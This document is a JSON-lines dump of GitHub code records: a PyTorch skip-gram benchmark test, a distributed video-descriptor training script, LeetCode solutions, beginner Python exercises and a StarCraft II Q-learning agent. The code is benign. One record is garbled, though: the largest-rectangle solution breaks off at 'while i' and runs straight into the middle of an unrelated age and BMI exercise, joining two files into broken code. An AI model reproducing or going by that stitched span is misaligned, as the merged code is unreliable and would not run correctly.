+{"seq_id":"30189960672","text":"import sys\n_module = sys.modules[__name__]\ndel sys\ninputdata = _module\nmodel = _module\nword2vec2 = _module\n\nfrom _paritybench_helpers import _mock_config, patch_functional\nfrom unittest.mock import mock_open, MagicMock\nfrom torch.autograd import Function\nfrom torch.nn import Module\nimport abc, collections, copy, enum, functools, inspect, itertools, logging, math, matplotlib, numbers, numpy, pandas, queue, random, re, scipy, sklearn, string, tensorflow, time, torch, torchaudio, torchtext, torchvision, types, typing, uuid, warnings\nimport numpy as np\nfrom torch import Tensor\npatch_functional()\nopen = mock_open()\nyaml = logging = sys = argparse = MagicMock()\nArgumentParser = argparse.ArgumentParser\n_global_config = args = argv = cfg = config = params = _mock_config()\nargparse.ArgumentParser.return_value.parse_args.return_value = _global_config\nyaml.load.return_value = _global_config\nsys.argv = _global_config\n__version__ = '1.0.0'\nxrange = range\nwraps = functools.wraps\n\n\nimport torch\n\n\nfrom torch.autograd import Variable\n\n\nimport torch.nn as nn\n\n\nimport torch.nn.functional as F\n\n\nimport numpy as np\n\n\nimport collections\n\n\nimport math\n\n\nimport random\n\n\nimport torch.optim as optim\n\n\nimport torch.nn.functional as Func\n\n\nfrom torch.optim.lr_scheduler import StepLR\n\n\nimport time\n\n\nclass skipgram(nn.Module):\n\n def __init__(self, vocab_size, embedding_dim):\n super(skipgram, self).__init__()\n self.u_embeddings = nn.Embedding(vocab_size, embedding_dim, sparse=True)\n self.v_embeddings = nn.Embedding(vocab_size, embedding_dim, sparse=True)\n self.embedding_dim = embedding_dim\n self.init_emb()\n\n def init_emb(self):\n initrange = 0.5 / self.embedding_dim\n self.u_embeddings.weight.data.uniform_(-initrange, initrange)\n self.v_embeddings.weight.data.uniform_(-0, 0)\n\n def forward(self, u_pos, v_pos, v_neg, batch_size):\n embed_u = self.u_embeddings(u_pos)\n embed_v = self.v_embeddings(v_pos)\n score = torch.mul(embed_u, embed_v)\n score = torch.sum(score, dim=1)\n log_target = F.logsigmoid(score).squeeze()\n neg_embed_v = self.v_embeddings(v_neg)\n neg_score = torch.bmm(neg_embed_v, embed_u.unsqueeze(2)).squeeze()\n neg_score = torch.sum(neg_score, dim=1)\n sum_log_sampled = F.logsigmoid(-1 * neg_score).squeeze()\n loss = log_target + sum_log_sampled\n return -1 * loss.sum() / batch_size\n\n def input_embeddings(self):\n return self.u_embeddings.weight.data.cpu().numpy()\n\n def save_embedding(self, file_name, id2word):\n embeds = self.u_embeddings.weight.data\n fo = open(file_name, 'w')\n for idx in range(len(embeds)):\n word = id2word(idx)\n embed = ' '.join(embeds[idx])\n fo.write(word + ' ' + embed + '\\n')\n\n","repo_name":"eladhoffer/pytorch-jit-paritybench","sub_path":"generated/test_fanglanting_skip_gram_pytorch.py","file_name":"test_fanglanting_skip_gram_pytorch.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"}
+{"seq_id":"37623600731","text":"import logging\nimport sys, os\nimport argparse\nimport random\n\nimport pandas as pd\nimport torch\nfrom vsc.baseline.model_factory.utils import build_dataset\nimport torch.nn.functional as F\nfrom video.model import MD\nimport torch.distributed as dist\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom mmcv import Config\nimport numpy as np\nfrom torch.utils.data import DataLoader\nfrom transformers import AdamW, get_linear_schedule_with_warmup\nimport torchsnooper\nimport torch.nn as nn\nfrom video.comm import all_gather as comm_gather\nfrom sklearn.metrics import average_precision_score\nfrom tqdm import tqdm\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', type=str, default=\"\")\n parser.add_argument('--batch_size', type=int, default=64)\n parser.add_argument('--num_workers', type=int, default=8)\n parser.add_argument('--feat_dim', type=int, default=1024)\n parser.add_argument('--bert_dim', type=int, default=768)\n parser.add_argument('--output_dim', type=int, default=256)\n parser.add_argument('--bert_path', type=str, default=\"\")\n parser.add_argument('--val_ann_path', type=str, default=\"\")\n parser.add_argument('--max_frames', type=int, default=256)\n parser.add_argument('--lr', type=float, default=5e-5)\n parser.add_argument('--t', type=float, default=0.05)\n parser.add_argument('--margin', type=float, default=0.5)\n parser.add_argument('--positive_ratio', type=float, default=0.1)\n parser.add_argument('--print_freq', type=int, default=50)\n parser.add_argument('--eval_freq', type=int, default=50)\n parser.add_argument('--work_dir', type=str, default='')\n parser.add_argument('--resume', type=str, default='')\n parser.add_argument('--epochs', type=int, default=10)\n parser.add_argument('--warmup_ratio', type=float, default=0.1)\n parser.add_argument('--clip_grad_norm', type=float, default=1)\n parser.add_argument('--local_rank', type=int, default=0)\n parser.add_argument('--fp16', action='store_true', default=False)\n parser.add_argument('--gradient_checkpointing', action='store_true', default=False)\n args = parser.parse_args()\n return args\n\n\nargs = parse_args()\n\nwork_dir = args.work_dir\nbatch_size = args.batch_size\nlr = args.lr\nepochs = args.epochs\nprint_freq = args.print_freq\nresume = args.resume if args.resume != '' else None\nwarmup_ratio = args.warmup_ratio\n\n\ndef setup_seed(seed):\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n random.seed(seed)\n torch.backends.cudnn.deterministic = True\n\n\nsetup_seed(1234)\n\n\ndef all_gather(local_rank, world_size, **tensors):\n tensors = list(tensors.values())\n _dims = [t.shape[-1] for t in tensors]\n tensors = torch.cat(tensors, dim=-1)\n tensors_all = [torch.zeros_like(tensors) for _ in range(world_size)]\n dist.all_gather(tensors_all, tensors)\n tensors_all[local_rank] = tensors\n tensors_all = torch.cat(tensors_all, dim=0)\n\n results = list()\n dimStart = 0\n assert sum(_dims) == tensors_all.shape[-1]\n for d in _dims:\n results.append(tensors_all[..., dimStart: dimStart + d])\n dimStart += d\n\n return tuple(results)\n\n\nworld_size = int(os.environ['WORLD_SIZE'])\ntorch.cuda.set_device(args.local_rank)\ndist.init_process_group(backend='nccl', init_method='env://', rank=args.local_rank, world_size=world_size)\n\nif args.local_rank == 0:\n os.system(\"mkdir -p %s\" % work_dir)\n os.system(\"mkdir -p %s/checkpoints\" % work_dir)\n logger = logging.getLogger('log')\n 
logger.setLevel(logging.INFO)\n\n ch = logging.StreamHandler(stream=sys.stdout)\n ch.setLevel(logging.INFO)\n formatter = logging.Formatter(\"[%(levelname)s: %(asctime)s] %(message)s\")\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n fh = logging.FileHandler(work_dir + '/log.txt')\n fh.setLevel(logging.INFO)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n\ncfg = Config.fromfile(args.config)\ncfg.local_rank = args.local_rank\n\ntrain_dataset = build_dataset(cfg.data.train)\ntrain_dataset.positive_ratio = args.positive_ratio\ntrain_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)\ntrain_loader = DataLoader(train_dataset, batch_size=batch_size, num_workers=args.num_workers, sampler=train_sampler)\n\nval_dataset = build_dataset(cfg.data.val)\nval_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset, drop_last=False, shuffle=False)\nval_loader = DataLoader(val_dataset, batch_size=batch_size, num_workers=args.num_workers, sampler=val_sampler)\n\nmodel = MD(args)\nmodel.cuda(args.local_rank)\n\n\nopt = AdamW(model.parameters(), lr=lr)\nbatch_size = batch_size * world_size\nstepsize = (len(train_dataset) // batch_size + 1)\ntotal_steps = (len(train_dataset) // batch_size + 1) * epochs\nscheduler = get_linear_schedule_with_warmup(opt, num_warmup_steps=warmup_ratio * total_steps,\n num_training_steps=total_steps)\n\nmodel = DDP(model, device_ids=[args.local_rank], output_device=args.local_rank, find_unused_parameters=True)\nscaler = torch.cuda.amp.GradScaler()\n\nstart_epoch = 0\nckpt = None\nif resume:\n ckpt = torch.load(resume, map_location='cpu')\nelif os.path.exists(work_dir + '/last.txt'):\n f = open(work_dir + '/last.txt')\n e = int(f.readline())\n f.close()\n ckpt = torch.load(work_dir + '/checkpoints/epoch_%d.pth' % e, map_location='cpu')\nif ckpt is not None:\n model.load_state_dict(ckpt['state_dict'])\n opt.load_state_dict(ckpt['optimizer'])\n scheduler.load_state_dict(ckpt['scheduler'])\n start_epoch = ckpt['epoch'] + 1\n del ckpt\n\n\ndef train_step(batch_data):\n # vid_a, vid_b = batch_data[\"vid_a\"], batch_data[\"vid_b\"]\n labels = batch_data[\"labels\"]\n cat_x = torch.cat([batch_data[\"frames_a\"], batch_data[\"frames_b\"]], dim=0)\n bz = batch_data[\"frames_a\"].size(0)\n embeds = model(cat_x)\n embeds = embeds / embeds.norm(dim=1, keepdim=True)\n\n emb_a, emb_b = embeds[:bz], embeds[bz:]\n\n # loss_ = F.cosine_embedding_loss(emb_a, emb_b, labels, margin=args.margin)\n loss_ = F.binary_cross_entropy_with_logits(F.cosine_similarity(emb_a, emb_b, dim=1) / 0.12, labels.float())\n\n emb_a, emb_b, labels = all_gather(args.local_rank, world_size, emb_a=emb_a, emb_b=emb_b, labels=labels[:, None])\n labels = labels.squeeze(1)\n\n sims = emb_a @ emb_b.t()\n gt = torch.arange(sims.size(0)).to(sims.device)\n vcv_loss_ = F.cross_entropy(sims / 0.07, gt, reduction=\"none\")[labels.gt(0)].mean()\n loss_ = vcv_loss_ + loss_\n\n scores_ = F.cosine_similarity(emb_a, emb_b, dim=1).detach().cpu().numpy()\n labels_ = labels.int().detach().cpu().numpy()\n pn_ = (labels_ == 1).sum() / labels_.shape[0]\n ap_ = average_precision_score(labels_, scores_)\n\n return loss_, ap_, pn_\n\n\nglobal_step = 0\nfor e in range(start_epoch, epochs):\n model.train()\n train_sampler.set_epoch(e)\n for b, batch in enumerate(train_loader):\n\n for _k, _v in batch.items():\n if isinstance(_v, torch.Tensor):\n batch[_k] = _v.cuda(args.local_rank)\n\n opt.zero_grad()\n if args.fp16:\n with torch.cuda.amp.autocast():\n loss, ap, pn = train_step(batch)\n 
scaler.scale(loss).backward()\n # torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip_grad_norm)\n scaler.step(opt)\n scaler.update()\n else:\n loss, ap, pn = train_step(batch)\n loss.backward()\n # torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip_grad_norm)\n opt.step()\n scheduler.step()\n global_step += 1\n\n if args.local_rank == 0 and b % print_freq == 0:\n logger.info('Epoch %d Batch %d Loss %.3f, AP %.3f, PN %.3f' % (e, b, loss.item(), ap, pn))\n\n if b > 0 and b % args.eval_freq == 0:\n # eval\n model.eval()\n vid2embedding = dict()\n\n with torch.no_grad(), torch.cuda.amp.autocast():\n for val_batch in val_loader:\n vids_ = []\n for vid_list in comm_gather(val_batch[\"vid\"]):\n vids_.extend(vid_list)\n\n val_embeds = model(val_batch[\"frames\"].cuda(args.local_rank))\n val_embeds = val_embeds / val_embeds.norm(dim=1, keepdim=True)\n tensors_temp = [torch.zeros_like(val_embeds) for _ in range(world_size)]\n dist.all_gather(tensors_temp, val_embeds)\n\n val_embeds = torch.cat(tensors_temp, dim=0).detach().cpu().numpy()\n\n for idx, emb in zip(vids_, val_embeds):\n vid2embedding[idx] = emb\n\n # do eval\n q_embeds = []\n r_embeds = []\n q_vids = []\n r_vids = []\n for idx, emb in vid2embedding.items():\n if idx.startswith(\"Q\"):\n q_embeds.append(emb)\n q_vids.append(idx)\n else:\n r_embeds.append(emb)\n r_vids.append(idx)\n\n with torch.no_grad():\n q_embeds = torch.tensor(np.array([x.tolist() for x in q_embeds]))\n r_embeds = torch.tensor(np.array([x.tolist() for x in r_embeds]))\n scores = q_embeds @ r_embeds.t() # q, (r1 + r2)\n scores = scores.detach().cpu().numpy()\n\n max_k = 1200\n norm_k = 1\n r1_scores = []\n r2_scores = []\n r1_vids = []\n for j, idx in enumerate(r_vids):\n if idx.startswith(\"R1\"):\n r1_scores.append(scores[:, j])\n r1_vids.append(idx)\n else:\n r2_scores.append(scores[:, j])\n\n r1_scores = np.stack(r1_scores, axis=1) # q, r1\n r2_scores = np.stack(r2_scores, axis=1) # q, r1\n\n if args.local_rank == 0:\n print(\"#####R1 Shape\", r1_scores.shape)\n print(\"#####R2 Shape\", r2_scores.shape)\n\n bias = np.sort(r2_scores, axis=1)[:, -norm_k:].mean(axis=1, keepdims=True) # q, 1\n # norm_scores = r1_scores - bias\n norm_scores = r1_scores\n top_k_scores = np.sort(norm_scores, axis=1)[:, -max_k:] # q, k\n top_k_index = np.argsort(norm_scores, axis=1)[:, -max_k:] # q, k\n\n val_ann = set()\n with open(args.val_ann_path, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n id1, id2 = line.strip().split(\",\")\n val_ann.add((id1, id2))\n\n pair_query = []\n pair_ref = []\n pair_scores = []\n pair_labels = []\n for r in range(top_k_scores.shape[0]):\n for c in range(top_k_scores.shape[1]):\n k = top_k_index[r, c]\n pair_scores.append(top_k_scores[r, c])\n pair_query.append(q_vids[r])\n pair_ref.append(r1_vids[k])\n if (q_vids[r], r1_vids[k]) in val_ann:\n pair_labels.append(1)\n else:\n pair_labels.append(0)\n\n pair_scores = np.array(pair_scores)\n pair_labels = np.array(pair_labels)\n\n result_df = pd.DataFrame()\n result_df[\"scores\"] = pair_scores\n result_df[\"query\"] = pair_query\n result_df[\"ref\"] = pair_ref\n result_df[\"labels\"] = pair_labels\n\n val_ap = average_precision_score(pair_labels, pair_scores)\n\n if args.local_rank == 0:\n print(\"*** Epoch %d Batch %d VAL AP %.3f\" % (e, b, val_ap))\n logger.info(\"*** Epoch %d Batch %d VAL AP %.3f\" % (e, b, val_ap))\n result_df.to_csv(f\"{args.work_dir}/result_step{global_step}.csv\", index=False)\n\n ckpt = {'state_dict': model.state_dict(), 'optimizer': opt.state_dict(), 
'scheduler': scheduler.state_dict(),\n 'epoch': e}\n torch.save(ckpt, work_dir + '/checkpoints/epoch_%d_step_%d.pth' % (e, global_step))\n model.train()\n","repo_name":"FeipengMa6/VSC22-Submission","sub_path":"VSC22-Descriptor-Track-1st/train/train_vid_score/video_descriptor_train.py","file_name":"video_descriptor_train.py","file_ext":"py","file_size_in_byte":12206,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"71"}
+{"seq_id":"25035175631","text":"# https://leetcode.com/problems/partition-labels/\nfrom typing import List\nfrom collections import defaultdict\n\n\nclass Solution:\n def partitionLabels(self, s: str) -> List[int]:\n index = defaultdict(lambda: (float(\"inf\"), float(\"-inf\")))\n for idx, letter in enumerate(s):\n index[letter] = (\n min(idx, index[letter][0]),\n max(idx, index[letter][1]),\n )\n partitions = []\n start, end = float(\"inf\"), float(\"-inf\")\n for idx, letter in enumerate(s):\n start, end = min(start, index[letter][0]), max(\n end, index[letter][1]\n )\n if idx == end:\n partitions.append(end - start + 1)\n start, end = float(\"inf\"), float(\"-inf\")\n return partitions\n\n\nif __name__ == \"__main__\":\n print(Solution().partitionLabels(\"\"))\n","repo_name":"mainden7/leetcode_problems","sub_path":"0.data_structures/4.strings/partition_labels.py","file_name":"partition_labels.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"37259323619","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 6 15:52:48 2019\n\n@author: yifeng\n\"\"\"\n\n# 题目详解参考\n# https://blog.csdn.net/weixin_42001089/article/details/84203651\n\nclass Solution:\n def largestRectangleArea(self,heights):\n heights.append(0)\n stack = []\n i = 0\n result = 0\n while i= 18:\n# print('adult')\n# elif int(age) >= 6:\n# print('teenager')\n# else:\n# print('kid')\n\n\n# BMI calculator\n\nsystem = input('What system are you using (M for metric, US for customary): ')\nweight = int(input('What is your weight: '))\nheight = int(input('What is your height: '))\n\ndef bmi_calculator(system, weight, height):\n bmi = (weight / (height ** 2))\n if system == 'US':\n bmi = bmi * 703\n if bmi < 18.5:\n return bmi, 'underweight'\n elif 18.5 <= bmi < 25:\n return bmi, 'normal weight'\n elif 25 <= bmi < 30:\n return bmi, 'overweight'\n else:\n return bmi, 'obese'\n\nbmi, status = bmi_calculator(system, weight, height)\nprint(f'Your bmi is {bmi} and you are {status}.')\n\n\ndef compare(a, b):\n if isinstance(a, str) or isinstance(b, str):\n return 'string involved'\n else:\n if a > b:\n return 'bigger'\n elif a == b:\n return 'equal'\n else:\n return 'smaller'\n\na = 'hello'\nb = 3\nc = 5\n\nprint(compare(a, b))\nprint(compare(b, c))\n\n\ndef cigar_party(cigars, is_weekend):\n return is_weekend and cigars >= 40 or 40 <= cigars <= 60\n","repo_name":"KyleLawson16/mis3640","sub_path":"session06/if-demo.py","file_name":"if-demo.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"24218747178","text":"# python -m pysc2.bin.agent \\ --map Simple64 \\ --agent attack_agent.SparseAgent \\ --agent_race T \\ --max_agent_steps 0 \\ --norender\n# Code segments used from: https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow\n\nimport random\nimport math\nimport os.path\n\nimport numpy as np\nimport pandas as pd\n\nfrom pysc2.agents import base_agent\nfrom pysc2.lib import actions\nfrom pysc2.lib import features\n\n_NO_OP = actions.FUNCTIONS.no_op.id\n_SELECT_POINT = actions.FUNCTIONS.select_point.id\n_BUILD_SUPPLY_DEPOT = actions.FUNCTIONS.Build_SupplyDepot_screen.id\n_BUILD_BARRACKS = actions.FUNCTIONS.Build_Barracks_screen.id\n_TRAIN_MARINE = actions.FUNCTIONS.Train_Marine_quick.id\n_SELECT_ARMY = actions.FUNCTIONS.select_army.id\n_ATTACK_MINIMAP = actions.FUNCTIONS.Attack_minimap.id\n_HARVEST_GATHER = actions.FUNCTIONS.Harvest_Gather_screen.id\n\n_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index\n_UNIT_TYPE = features.SCREEN_FEATURES.unit_type.index\n_PLAYER_ID = features.SCREEN_FEATURES.player_id.index\n\n_PLAYER_SELF = 1\n_PLAYER_HOSTILE = 4\n_ARMY_SUPPLY = 5\n\n_TERRAN_COMMANDCENTER = 18\n_TERRAN_SCV = 45\n_TERRAN_SUPPLY_DEPOT = 19\n_TERRAN_BARRACKS = 21\n_NEUTRAL_MINERAL_FIELD = 341\n\n_NOT_QUEUED = [0]\n_QUEUED = [1]\n_SELECT_ALL = [2] # Allows the selecting of all units of a certain type\n\nDATA_FILE = 'sparse_agent_data' # Used for storing the Q-Table\n\nACTION_DO_NOTHING = 'donothing'\nACTION_BUILD_SUPPLY_DEPOT = 'buildsupplydepot'\nACTION_BUILD_BARRACKS = 'buildbarracks'\nACTION_BUILD_MARINE = 'buildmarine'\nACTION_ATTACK = 'attack'\n\nsmart_actions = [\n ACTION_DO_NOTHING,\n ACTION_BUILD_SUPPLY_DEPOT,\n ACTION_BUILD_BARRACKS,\n ACTION_BUILD_MARINE,\n]\n\n# Since we are using the minimap we would have a 64x64 grid\nfor mm_x in range(0, 64):\n for mm_y in range(0, 64):\n if (mm_x + 1) % 32 == 0 and (mm_y + 1) % 32 == 0:\n # Create every possible attack position. 
Will look like: \"attack_5_10\"\n smart_actions.append(ACTION_ATTACK + '_' +\n str(mm_x - 16) + '_' + str(mm_y - 16)) # Subtract 16 bec we want to select the top left corner of grid\n\n\n\nclass QLearningTable:\n def __init__(self, actions, learning_rate=0.01, reward_decay=0.9, e_greedy=0.9):\n self.actions = actions # list of int\n self.lr = learning_rate\n self.gamma = reward_decay\n self.epsilon = e_greedy\n self.q_table = pd.DataFrame(columns=self.actions, dtype=np.float64)\n\n def choose_action(self, observation):\n self.check_state_exist(observation)\n\n # Uses epsilon greedy exploration to find the next action\n if np.random.uniform() < self.epsilon:\n # choose best action\n state_action = self.q_table.ix[observation, :]\n\n # some actions have the same value\n state_action = state_action.reindex(np.random.permutation(state_action.index))\n\n action = state_action.idxmax() # Return max value\n else:\n # choose random action\n action = np.random.choice(self.actions)\n\n return action\n\n def learn(self, s, a, r, next_s):\n self.check_state_exist(next_s)\n self.check_state_exist(s)\n\n q_predict = self.q_table.ix[s, a]\n\n if next_s != 'terminal': # Not terminal meaning it does not end the game, then apply a reward\n # From next state check all actions and take the max value\n q_target = r + self.gamma * self.q_table.ix[next_s, :].max() #NEEDS TO BE UPDATED TO USE \"TD ERROR\"\n else:\n q_target = r # next state is terminal, dont apply reward\n\n # update\n self.q_table.ix[s, a] += self.lr * (q_target - q_predict)\n\n # Check the state exists if not we add it to the table. Makes the agent dynamically learn new states\n def check_state_exist(self, state):\n if state not in self.q_table.index:\n # append new state to q table\n self.q_table = self.q_table.append(pd.Series([0] * len(self.actions), index=self.q_table.columns, name=state)) # [0] * len(actions) creates an array with 8 zeros in it\n\n\nclass SparseAgent(base_agent.BaseAgent):\n def __init__(self):\n super(SparseAgent, self).__init__()\n\n self.qlearn = QLearningTable(actions=list(range(len(smart_actions))))\n\n self.previous_action = None\n self.previous_state = None\n\n # Command Center location\n self.cc_y = None\n self.cc_x = None\n\n # Since it is using multistep actions, we keep track of it using move_number\n self.move_number = 0\n\n if os.path.isfile(DATA_FILE + '.gz'):\n self.qlearn.q_table = pd.read_pickle(DATA_FILE + '.gz', compression='gzip')\n\n # Used for the case when base is at bottom right\n def transformDistance(self, x, x_distance, y, y_distance):\n if not self.base_top_left:\n return [x - x_distance, y - y_distance]\n\n return [x + x_distance, y + y_distance]\n\n # Used for the case when base is at bottom right\n def transformLocation(self, x, y):\n if not self.base_top_left:\n return [64 - x, 64 - y]\n\n return [x, y]\n\n # Get the action and location\n def splitAction(self, action_id):\n smart_action = smart_actions[action_id]\n\n x = 0\n y = 0\n if '_' in smart_action:\n smart_action, x, y = smart_action.split('_')\n\n return (smart_action, x, y)\n\n def step(self, obs):\n super(SparseAgent, self).step(obs)\n\n # Checks that game has ended if so then get final reward\n if obs.last():\n reward = obs.reward # Returned by the game: 1 if win, -1 for loss and 0 for tie (reached at 28000 steps defualt)\n\n self.qlearn.learn(str(self.previous_state), self.previous_action, reward, 'terminal')\n\n self.qlearn.q_table.to_pickle(DATA_FILE + '.gz', 'gzip')\n\n self.previous_action = None\n self.previous_state = 
None\n\n self.move_number = 0\n\n return actions.FunctionCall(_NO_OP, [])\n\n unit_type = obs.observation['screen'][_UNIT_TYPE]\n\n # Checks if it's the first step of the game, then creates required items\n if obs.first():\n # Player y and x are a list of the agent's units in pixels covered by the unit\n player_y, player_x = (obs.observation['minimap'][_PLAYER_RELATIVE] == _PLAYER_SELF).nonzero()\n\n # Take from list the mean value and check position. If mean is greater than 31 chances are the units are on bottom right\n self.base_top_left = 1 if player_y.any() and player_y.mean() <= 31 else 0\n\n self.cc_y, self.cc_x = (unit_type == _TERRAN_COMMANDCENTER).nonzero()\n\n cc_y, cc_x = (unit_type == _TERRAN_COMMANDCENTER).nonzero()\n cc_count = 1 if cc_y.any() else 0\n\n # We need to count how many of each we have. In this case we get the length of the pixels covered by the unit and divide by its pixel size\n depot_y, depot_x = (unit_type == _TERRAN_SUPPLY_DEPOT).nonzero()\n supply_depot_count = int(round(len(depot_y) / 69)) # Divide by the number of pixels a depot usually covers \"69\" in this case\n\n barracks_y, barracks_x = (unit_type == _TERRAN_BARRACKS).nonzero()\n barracks_count = int(round(len(barracks_y) / 137)) # Divide by the number of pixels a barracks usually takes \"137\" in this case\n\n\n if self.move_number == 0:\n self.move_number += 1\n\n # Define running stats of the player. This is the state of the game for the agent\n current_state = np.zeros(8)\n current_state[0] = cc_count # Number of command centers\n current_state[1] = supply_depot_count # Number of supply depots\n current_state[2] = barracks_count # Number of barracks\n current_state[3] = obs.observation['player'][_ARMY_SUPPLY] # Army supply \n\n # Hot squares define the locations where enemies are. We divide map into 4 quadrants and mark each with 1 if enemy found\n hot_squares = np.zeros(4)\n # Get a list of hostile units locations\n enemy_y, enemy_x = (obs.observation['minimap'][_PLAYER_RELATIVE] == _PLAYER_HOSTILE).nonzero()\n\n for i in range(0, len(enemy_y)):\n y = int(math.ceil((enemy_y[i] + 1) / 32))\n x = int(math.ceil((enemy_x[i] + 1) / 32))\n\n hot_squares[((y - 1) * 2) + (x - 1)] = 1\n\n if not self.base_top_left:\n hot_squares = hot_squares[::-1]\n\n for i in range(0, 4):\n current_state[i + 4] = hot_squares[i]\n\n # Unless this is the first step, learn from the previous action\n if self.previous_action is not None:\n self.qlearn.learn(str(self.previous_state), self.previous_action, 0, str(current_state))\n\n # Get action to do\n rl_action = self.qlearn.choose_action(str(current_state))\n\n self.previous_state = current_state\n self.previous_action = rl_action\n\n smart_action, x, y = self.splitAction(self.previous_action)\n\n \"\"\" All actions will be 3 game steps: \n - The selection of a unit\n - The action to take\n - A follow up action\n \"\"\"\n\n # Build Barracks\n if smart_action == ACTION_BUILD_BARRACKS or smart_action == ACTION_BUILD_SUPPLY_DEPOT:\n unit_y, unit_x = (unit_type == _TERRAN_SCV).nonzero() # Get list of scv units\n\n if unit_y.any():\n i = random.randint(0, len(unit_y) - 1)\n target = [unit_x[i], unit_y[i]] # Pick a random one\n\n return actions.FunctionCall(_SELECT_POINT, [_NOT_QUEUED, target]) # Select the unit\n \n # Build Marine\n elif smart_action == ACTION_BUILD_MARINE:\n if barracks_y.any():\n i = random.randint(0, len(barracks_y) - 1)\n target = [barracks_x[i], barracks_y[i]]\n\n return actions.FunctionCall(_SELECT_POINT, [_SELECT_ALL, target]) # Use select all to choose all barracks. 
The game auto chooses empty barracks to build units in to balance workload\n \n # Select the army\n elif smart_action == ACTION_ATTACK:\n if _SELECT_ARMY in obs.observation['available_actions']:\n return actions.FunctionCall(_SELECT_ARMY, [_NOT_QUEUED])\n\n # Increment into next move stage\n elif self.move_number == 1:\n self.move_number += 1\n\n smart_action, x, y = self.splitAction(self.previous_action) # Get next move\n\n # Build Supply Depot\n if smart_action == ACTION_BUILD_SUPPLY_DEPOT:\n if supply_depot_count < 2 and _BUILD_SUPPLY_DEPOT in obs.observation['available_actions']: # We want to build 2 depots\n if self.cc_y.any():\n if supply_depot_count == 0:\n # Build them in fixed locations\n target = self.transformDistance(round(self.cc_x.mean()), -35, round(self.cc_y.mean()), 0)\n elif supply_depot_count == 1:\n target = self.transformDistance(round(self.cc_x.mean()), -25, round(self.cc_y.mean()), -25)\n\n return actions.FunctionCall(_BUILD_SUPPLY_DEPOT, [_NOT_QUEUED, target])\n\n # Build Barracks\n elif smart_action == ACTION_BUILD_BARRACKS:\n if barracks_count < 2 and _BUILD_BARRACKS in obs.observation['available_actions']: # Build only 2\n if self.cc_y.any():\n # Build them in fixed locations\n if barracks_count == 0:\n target = self.transformDistance(round(self.cc_x.mean()), 15, round(self.cc_y.mean()), -9) \n elif barracks_count == 1:\n target = self.transformDistance(round(self.cc_x.mean()), 15, round(self.cc_y.mean()), 12)\n\n return actions.FunctionCall(_BUILD_BARRACKS, [_NOT_QUEUED, target])\n \n # Build Marine\n elif smart_action == ACTION_BUILD_MARINE:\n if _TRAIN_MARINE in obs.observation['available_actions']:\n return actions.FunctionCall(_TRAIN_MARINE, [_QUEUED])\n\n # Attack with marines\n elif smart_action == ACTION_ATTACK:\n do_it = True\n\n # Make sure no SCV selected\n if len(obs.observation['single_select']) > 0 and obs.observation['single_select'][0][0] == _TERRAN_SCV:\n do_it = False\n # Make sure no SCV selected with army\n if len(obs.observation['multi_select']) > 0 and obs.observation['multi_select'][0][0] == _TERRAN_SCV:\n do_it = False\n\n # Find random quad to attack. REMEMBER that attacking a point attacks 4 surrounding quads. So we choose the center of a quad and this will attack surrounding area\n if do_it and _ATTACK_MINIMAP in obs.observation[\"available_actions\"]:\n x_offset = random.randint(-1, 1)\n y_offset = random.randint(-1, 1)\n\n return actions.FunctionCall(_ATTACK_MINIMAP, [_NOT_QUEUED, self.transformLocation(int(x) + (x_offset * 8), int(y) + (y_offset * 8))])\n\n # Reset the move counter. We now ensure the SCV goes back to work after building \n elif self.move_number == 2:\n self.move_number = 0\n\n smart_action, x, y = self.splitAction(self.previous_action)\n\n # We check that we had sent an SCV to do the building\n if smart_action == ACTION_BUILD_BARRACKS or smart_action == ACTION_BUILD_SUPPLY_DEPOT:\n # Check it can harvest\n if _HARVEST_GATHER in obs.observation['available_actions']:\n unit_y, unit_x = (unit_type == _NEUTRAL_MINERAL_FIELD).nonzero()\n\n if unit_y.any():\n i = random.randint(0, len(unit_y) - 1)\n\n # Get random harvest location\n m_x = unit_x[i]\n m_y = unit_y[i]\n\n target = [int(m_x), int(m_y)]\n\n return actions.FunctionCall(_HARVEST_GATHER, [_QUEUED, target]) # Send SCV to harvest. 
NOTICE it is queued so SCV will finish building first\n\n return actions.FunctionCall(_NO_OP, [])\n\n","repo_name":"chrisjl154/meng_project","sub_path":"agent_code/attack_agent.py","file_name":"attack_agent.py","file_ext":"py","file_size_in_byte":14685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"}
+{"seq_id":"72879089191","text":"'''\r\nCreated on 2018/10/28\r\n\r\n@author: onohdn\r\n\r\nExercise\r\nWrite a program that determines whether an input number is a multiple of 4.\r\n\r\nExpected results\r\nEnter a number->8\r\nIt is a multiple of 4\r\n\r\nEnter a number->9\r\nIt is not a multiple of 4\r\n\r\n'''\r\n\r\ntry:\r\n x = int(input(\"Enter a number->\"))\r\n\r\n if x%4 == 0:\r\n print(\"It is a multiple of 4\")\r\n else:\r\n print(\"It is not a multiple of 4\")\r\n\r\nexcept ValueError:\r\n\r\n print(\"Please enter a number\")\r\n","repo_name":"onohdn/MyPythonRepository","sub_path":"practice3.py","file_name":"practice3.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
